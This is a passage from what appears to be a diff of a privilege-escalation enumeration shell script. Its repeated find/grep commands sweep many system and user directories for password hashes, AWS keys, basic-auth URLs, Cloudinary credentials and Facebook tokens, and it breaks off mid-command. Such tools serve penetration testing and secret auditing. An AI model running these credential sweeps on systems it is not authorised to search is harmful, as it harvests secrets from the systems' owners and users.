-type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -echo '' -print_2title "Searching Raw Hashes" -print_3title_no_nl "Searching sha512 (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -echo '' -print_2title "Searching APIs" -print_3title_no_nl "Searching AWS Client ID (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching AWS MWS Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching AWS Secret Key (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Basic Auth Credentials (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Cloudinary Basic Auth (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "cloudinary://[0-9]{15}:[0-9A-Za-z]+@[a-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Facebook Access Token (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "EAACEdEose0cBA[0-9A-Za-z]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Facebook Client ID (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -else - timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & - timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "([fF][aA][cC][eE][bB][oO][oO][kK]|[fF][bB])(.{0,20})?['\"][0-9]{13,17}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & -fi -wait -print_3title_no_nl "Searching Facebook Oauth (limited to 50)..." -if [ "$SEARCH_IN_FOLDER" ]; then - timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE 